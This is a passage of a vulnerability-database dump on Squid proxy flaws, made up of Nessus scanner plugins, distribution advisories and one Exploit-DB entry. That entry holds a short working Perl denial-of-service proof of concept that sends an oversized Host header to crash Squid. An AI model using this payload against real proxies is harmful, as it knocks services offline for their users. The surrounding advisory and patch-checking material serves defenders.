script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"squid-2.7.STABLE5-2.12.16.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"squid-2.7.STABLE5-2.12.16.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T00:18:15", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities has been discovered and corrected in squid :\n\nDue to incorrect data validation Squid is vulnerable to a buffer\noverflow attack when processing specially crafted HTTP requests. This\nproblem allows any trusted client or client script who can generate\nHTTP requests to trigger a buffer overflow in Squid, resulting in a\ntermination of the Squid service (CVE-2013-4115).\n\nThe updated packages have been patched to correct this issue.", "modified": "2020-01-02T00:00:00", "id": "MANDRIVA_MDVSA-2013-199.NASL", "href": "https://www.tenable.com/plugins/nessus/69067", "published": "2013-07-26T00:00:00", "title": "Mandriva Linux Security Advisory : squid (MDVSA-2013:199)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:199. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69067);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/08/02 13:32:55\");\n\n script_cve_id(\"CVE-2013-4115\");\n script_bugtraq_id(61111);\n script_xref(name:\"MDVSA\", value:\"2013:199\");\n\n script_name(english:\"Mandriva Linux Security Advisory : squid (MDVSA-2013:199)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in squid :\n\nDue to incorrect data validation Squid is vulnerable to a buffer\noverflow attack when processing specially crafted HTTP requests. This\nproblem allows any trusted client or client script who can generate\nHTTP requests to trigger a buffer overflow in Squid, resulting in a\ntermination of the Squid service (CVE-2013-4115).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2013-0227.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.squid-cache.org/Advisories/SQUID-2013_2.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid and / or squid-cachemgr packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:squid-cachemgr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"squid-3.1.19-5.3.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"squid-cachemgr-3.1.19-5.3.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T00:27:15", "bulletinFamily": "scanner", "description": "This squid3 update includes several security fixes and minor changes.\n\n -\n squid-3.1.x-bnc829084-CVE-2013-4115-BO_request_handling.\n diff Squid advisory SQUID-2013_2, CVE-2013-4115,\n [bnc#829084] Specially crafted http requests can trigger\n a buffer overflow when squid attempts to resolve an\n overly long hostname.\n\n - run logrotate as squid:nogroup [bnc#677335]", "modified": "2020-01-02T00:00:00", "id": "OPENSUSE-2013-700.NASL", "href": "https://www.tenable.com/plugins/nessus/75142", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : squid3 (openSUSE-SU-2013:1441-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-700.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75142);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-4115\");\n\n script_name(english:\"openSUSE Security Update : squid3 (openSUSE-SU-2013:1441-1)\");\n script_summary(english:\"Check for the openSUSE-2013-700 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid3 update includes several security fixes and minor changes.\n\n -\n squid-3.1.x-bnc829084-CVE-2013-4115-BO_request_handling.\n diff Squid advisory SQUID-2013_2, CVE-2013-4115,\n [bnc#829084] Specially crafted http requests can trigger\n a buffer overflow when squid attempts to resolve an\n overly long hostname.\n\n - run logrotate as squid:nogroup [bnc#677335]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-09/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"squid3-3.1.23-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"squid3-debuginfo-3.1.23-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"squid3-debugsource-3.1.23-2.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid3 / squid3-debuginfo / squid3-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T06:40:04", "bulletinFamily": "scanner", "description": "A flaw was found in the way Squid handled malformed HTTP Range\nheaders. A remote attacker able to send HTTP requests to the Squid\nproxy could use this flaw to crash Squid. (CVE-2014-3609)\n\nA buffer overflow flaw was found in Squid", "modified": "2020-01-02T00:00:00", "id": "ALA_ALAS-2014-411.NASL", "href": "https://www.tenable.com/plugins/nessus/78354", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : squid (ALAS-2014-411)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-411.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78354);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2014-3609\");\n script_xref(name:\"ALAS\", value:\"2014-411\");\n script_xref(name:\"RHSA\", value:\"2014:1148\");\n\n script_name(english:\"Amazon Linux AMI : squid (ALAS-2014-411)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way Squid handled malformed HTTP Range\nheaders. A remote attacker able to send HTTP requests to the Squid\nproxy could use this flaw to crash Squid. (CVE-2014-3609)\n\nA buffer overflow flaw was found in Squid's DNS lookup module. A\nremote attacker able to send HTTP requests to the Squid proxy could\nuse this flaw to crash Squid. (CVE-2013-4115)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-411.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update squid' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:squid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"squid-3.1.10-22.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"squid-debuginfo-3.1.10-22.16.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid / squid-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:35", "bulletinFamily": "unix", "description": "\nSquid project reports:\n\nDue to incorrect data validation Squid is vulnerable to a\n\t denial of service attack when processing specially crafted\n\t HTTP requests\nThis problem allows any client who can generate HTTP requests\n\t to perform a denial of service attack on the Squid service.\n\n", "modified": "2013-07-13T00:00:00", "published": "2013-07-13T00:00:00", "id": "30A04AB4-ED7B-11E2-8643-8C705AF55518", "href": "https://vuxml.freebsd.org/freebsd/30a04ab4-ed7b-11e2-8643-8c705af55518.html", "title": "squid -- denial of service", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T04:36:57", "bulletinFamily": "exploit", "description": "Squid 3.3.5 - DoS PoC. CVE-2013-4123. Dos exploit for linux platform", "modified": "2013-07-16T00:00:00", "published": "2013-07-16T00:00:00", "id": "EDB-ID:26886", "href": "https://www.exploit-db.com/exploits/26886/", "type": "exploitdb", "title": "Squid 3.3.5 - DoS PoC", "sourceData": "#Squid Crash PoC\r\n#Copyright (C) Kingcope 2013\r\n#tested against squid-3.3.5\r\n#this seems to be the patch for the vulnerability:\r\n#http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch\r\n#The squid-cache service will respawn, looks like a kind of assert exception:\r\n#2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128\r\n#2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting...\r\n#2013/07/15 20:48:36 kid1| Finished. Wrote 0 entries.\r\n#2013/07/15 20:48:36 kid1| Took 0.00 seconds ( 0.00 entries/sec).\r\n#FATAL: Bungled (null) line 9: snmp_access deny all\r\n#Squid Cache (Version 3.2.11): Terminated abnormally.\r\n#CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys\r\n#Maximum Resident Size: 33312 KB\r\n#Page faults with physical i/o: 0\r\n#Memory usage for squid via mallinfo():\r\n# total space in arena: 4100 KB\r\n# Ordinary blocks: 4046 KB 7 blks\r\n# Small blocks: 0 KB 0 blks\r\n# Holding blocks: 564 KB 2 blks\r\n# Free Small blocks: 0 KB\r\n# Free Ordinary blocks: 53 KB\r\n# Total in use: 4610 KB 112%\r\n# Total free: 53 KB 1%\r\n#2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for\r\ni686-pc-linux-gnu...\r\n#2013/07/15 20:48:39 kid1| Process ID 2990\r\n\r\nuse IO::Socket;\r\n\r\nmy $sock = IO::Socket::INET->new(PeerAddr => '192.168.27.146',\r\n PeerPort => '3128',\r\n Proto => 'tcp');\r\n$a = \"yc\" x 2000;\r\nprint $sock \"HEAD http://yahoo.com/ HTTP/1.1\\r\\nHost: yahoo.com:$a\\r\\n\\r\\n\";\r\nwhile(<$sock>) {\r\nprint;\r\n}\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26886/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2013:199\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : squid\r\n Date : July 25, 2013\r\n Affected: Business Server 1.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in squid:\r\n \r\n Due to incorrect data validation Squid is vulnerable to a buffer\r\n overflow attack when processing specially crafted HTTP requests. This\r\n problem allows any trusted client or client script who can generate\r\n HTTP requests to trigger a buffer overflow in Squid, resulting in a\r\n termination of the Squid service &#40;CVE-2013-4115&#41;.\r\n \r\n The updated packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4115\r\n http://advisories.mageia.org/MGASA-2013-0227.html\r\n http://www.squid-cache.org/Advisories/SQUID-2013_2.txt\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Enterprise Server 5:\r\n ffce88499a510acbcb177beac961e9b5 mes5/i586/squid-3.0-22.7mdvmes5.2.i586.rpm\r\n 7ef29bd52a77c505ec582ff43fd4880e mes5/i586/squid-cachemgr-3.0-22.7mdvmes5.2.i586.rpm \r\n d8de5bdfa7aaf524b2a94d8ce7c59629 mes5/SRPMS/squid-3.0-22.7mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 10ee4e981bf49d1767b56e15a0af9539 mes5/x86_64/squid-3.0-22.7mdvmes5.2.x86_64.rpm\r\n bf67fa8e85c5b57a7f1cb23c170d2833 mes5/x86_64/squid-cachemgr-3.0-22.7mdvmes5.2.x86_64.rpm \r\n d8de5bdfa7aaf524b2a94d8ce7c59629 mes5/SRPMS/squid-3.0-22.7mdvmes5.2.src.rpm\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 6ad99274db9760788fe533ed03672813 mbs1/x86_64/squid-3.1.19-5.3.mbs1.x86_64.rpm\r\n 7d66032f7c6d79a90ad2ab8ac787e79e mbs1/x86_64/squid-cachemgr-3.1.19-5.3.mbs1.x86_64.rpm \r\n 223b131a5049b8b4c5f1f6b0b1c23bf9 mbs1/SRPMS/squid-3.1.19-5.3.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFR8SC/mqjQ0CJFipgRAiaRAKCrvic5GEfc4/CKdLurJ4y37O6p6ACg6Zrd\r\n5atifJVNW28SfiaXIscr7q8=\r\n=Xl/9\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:DOC:29651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29651", "title": "[ MDVSA-2013:199 ] squid", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "description": "Crash on invalid Host: header.", "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:VULN:13190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13190", "title": "squid DoS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:53", "bulletinFamily": "unix", "description": "Squid is a high-performance proxy caching server for web clients,\nsupporting FTP, Gopher, and HTTP data objects.\n\nA flaw was found in the way Squid handled malformed HTTP Range headers.\nA remote attacker able to send HTTP requests to the Squid proxy could use\nthis flaw to crash Squid. (CVE-2014-3609)\n\nA buffer overflow flaw was found in Squid's DNS lookup module. A remote\nattacker able to send HTTP requests to the Squid proxy could use this flaw\nto crash Squid. (CVE-2013-4115)\n\nRed Hat would like to thank the Squid project for reporting the\nCVE-2014-3609 issue. Upstream acknowledges Matthew Daley as the original\nreporter.\n\nAll Squid users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues. After installing this\nupdate, the squid service will be restarted automatically.\n", "modified": "2018-06-06T20:24:22", "published": "2014-09-03T04:00:00", "id": "RHSA-2014:1148", "href": "https://access.redhat.com/errata/RHSA-2014:1148", "type": "redhat", "title": "(RHSA-2014:1148) Important: squid security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:42", "bulletinFamily": "unix", "description": "[7:3.1.10-22]\n- Resolves: #1134936 - CVE-2013-4115 buffer overflow when processing overly long DNS names\n[7:3.1.10-21]\n- Resolves: #1134936 - CVE-2014-3609 assertion failure in header processing", "modified": "2014-09-03T00:00:00", "published": "2014-09-03T00:00:00", "id": "ELSA-2014-1148", "href": "http://linux.oracle.com/errata/ELSA-2014-1148.html", "title": "squid security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2019-05-29T17:22:46", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA flaw was found in the way Squid handled malformed HTTP Range headers. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid. ([CVE-2014-3609 __](<https://access.redhat.com/security/cve/CVE-2014-3609>))\n\nA buffer overflow flaw was found in Squid's DNS lookup module. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid. ([CVE-2013-4115 __](<https://access.redhat.com/security/cve/CVE-2013-4115>))\n\n \n**Affected Packages:** \n\n\nsquid\n\n \n**Issue Correction:** \nRun _yum update squid_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n squid-debuginfo-3.1.10-22.16.amzn1.i686 \n squid-3.1.10-22.16.amzn1.i686 \n \n src: \n squid-3.1.10-22.16.amzn1.src \n \n x86_64: \n squid-3.1.10-22.16.amzn1.x86_64 \n squid-debuginfo-3.1.10-22.16.amzn1.x86_64 \n \n \n", "modified": "2014-09-19T12:09:00", "published": "2014-09-19T12:09:00", "id": "ALAS-2014-411", "href": "https://alas.aws.amazon.com/ALAS-2014-411.html", "title": "Important: squid", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:22:45", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA flaw was found in the way Squid handled malformed HTTP Range headers. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid. ([CVE-2014-3609 __](<https://access.redhat.com/security/cve/CVE-2014-3609>))\n\nA buffer overflow flaw was found in Squid's DNS lookup module. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid. ([CVE-2013-4115 __](<https://access.redhat.com/security/cve/CVE-2013-4115>))\n\nSquid 3.1 before 3.3.12 and 3.4 before 3.4.4, when SSL-Bump is enabled, allows remote attackers to cause a denial of service (assertion failure) via a crafted range request, related to state management. ([CVE-2014-0128 __](<https://access.redhat.com/security/cve/CVE-2014-0128>))\n\n \n**Affected Packages:** \n\n\nsquid\n\n \n**Issue Correction:** \nRun _yum update squid_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n squid-3.1.10-29.17.amzn1.i686 \n squid-debuginfo-3.1.10-29.17.amzn1.i686 \n \n src: \n squid-3.1.10-29.17.amzn1.src \n \n x86_64: \n squid-3.1.10-29.17.amzn1.x86_64 \n squid-debuginfo-3.1.10-29.17.amzn1.x86_64 \n \n \n", "modified": "2014-10-22T13:20:00", "published": "2014-10-22T13:20:00", "id": "ALAS-2014-433", "href": "https://alas.aws.amazon.com/ALAS-2014-433.html", "title": "Important: squid", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:26:39", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:1148\n\n\nSquid is a high-performance proxy caching server for web clients,\nsupporting FTP, Gopher, and HTTP data objects.\n\nA flaw was found in the way Squid handled malformed HTTP Range headers.\nA remote attacker able to send HTTP requests to the Squid proxy could use\nthis flaw to crash Squid. (CVE-2014-3609)\n\nA buffer overflow flaw was found in Squid's DNS lookup module. A remote\nattacker able to send HTTP requests to the Squid proxy could use this flaw\nto crash Squid. (CVE-2013-4115)\n\nRed Hat would like to thank the Squid project for reporting the\nCVE-2014-3609 issue. Upstream acknowledges Matthew Daley as the original\nreporter.\n\nAll Squid users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues. After installing this\nupdate, the squid service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/032572.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/032575.html\n\n**Affected packages:**\nsquid\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1148.html", "modified": "2014-09-04T00:18:56", "published": "2014-09-03T23:16:08", "href": "http://lists.centos.org/pipermail/centos-announce/2014-September/032572.html", "id": "CESA-2014:1148", "title": "squid security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:03", "bulletinFamily": "unix", "description": "### Background\n\nSquid is a full-featured web proxy cache.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Squid. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to 